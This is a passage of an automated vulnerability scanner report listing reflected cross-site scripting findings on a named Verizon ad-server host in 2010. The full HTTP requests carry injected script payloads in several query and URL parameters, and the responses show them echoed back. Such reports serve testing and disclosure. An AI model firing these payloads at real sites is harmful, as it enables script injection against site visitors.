The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c188b"><script>alert(1)</script>0cde3fe4bae was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=c188b"><script>alert(1)</script>0cde3fe4bae&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=c188b"><script>alert(1)</script>0cde3fe4bae&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.564. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb304"><script>alert(1)</script>c74497aee88 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=bb304"><script>alert(1)</script>c74497aee88&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
1693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=bb304"><script>alert(1)</script>c74497aee88&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.565. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2d07"><script>alert(1)</script>417cf855cee was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=e2d07"><script>alert(1)</script>417cf855cee&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=e2d07"><script>alert(1)</script>417cf855cee&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.566. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2db"><script>alert(1)</script>ffaec5fee0d was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bc2db"><script>alert(1)</script>ffaec5fee0d&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bc2db"><script>alert(1)</script>ffaec5fee0d&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.567. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 562c5"><script>alert(1)</script>a8c9a010de3 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=562c5"><script>alert(1)</script>a8c9a010de3&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:24:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=562c5"><script>alert(1)</script>a8c9a010de3&search=" target="_top">
...[SNIP]...

2.568. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a06c7"><script>alert(1)</script>a46d267198c was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=a06c7"><script>alert(1)</script>a46d267198c&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
opservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=a06c7"><script>alert(1)</script>a46d267198c&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.569. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c1b"><script>alert(1)</script>6238df5bdc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 360
Content-Type: text/html
Cache-Control: private
Content-Length: 360

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/1294431043/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.570. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c9"><script>alert(1)</script>4b86c156f98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/L15/780459428/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservi
...[SNIP]...

2.571. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d40a'%3bdeb118e0099 was submitted in the REST URL parameter 6. This input was echoed as 5d40a';deb118e0099 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5d40a'%3bdeb118e0099?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:30:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PKDjrO10escOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 1201
Content-Type: text/html
Cache-Control: private
Content-Length: 1201

<SCRIPT language="JavaScript" type="text/javascript">
<!--
document.write('<SCR'+'IPT src="http://servedbyy.com/advertpro/servlet/view/banner/javascript/zone?zid=37&pid=16&random='+Math.floor(899999
...[SNIP]...
*Math.random()+10000000)+'&millis='+new Date().getTime()+'&referrer='+escape(document.location)+'&encode=1&cturl=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/5d40a';deb118e0099/L24/1077715170/UNKNOWN/VDSL/QuiBids_NAF_ROS_300x250_2010-11/Quibids_ROS_300x250_2010-11.html/726e6f58326b7a6e4b45494141693565?" language="JavaScript" type="text/javascript">
...[SNIP]...

2.572. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b232"><script>alert(1)</script>05b5cc07ece was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top6b232"><script>alert(1)</script>05b5cc07ece?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 351
Content-Type: text/html
Cache-Control: private
Content-Length: 351

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/623428622/Top6b232"><script>alert(1)</script>05b5cc07ece/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.573. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd200"a%3d"b"4f3fa442ed1 was submitted in the REST URL parameter 6. This input was echoed as dd200"a="b"4f3fa442ed1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/dd200"a%3d"b"4f3fa442ed1?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PJclQO20erias|O10escOz; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
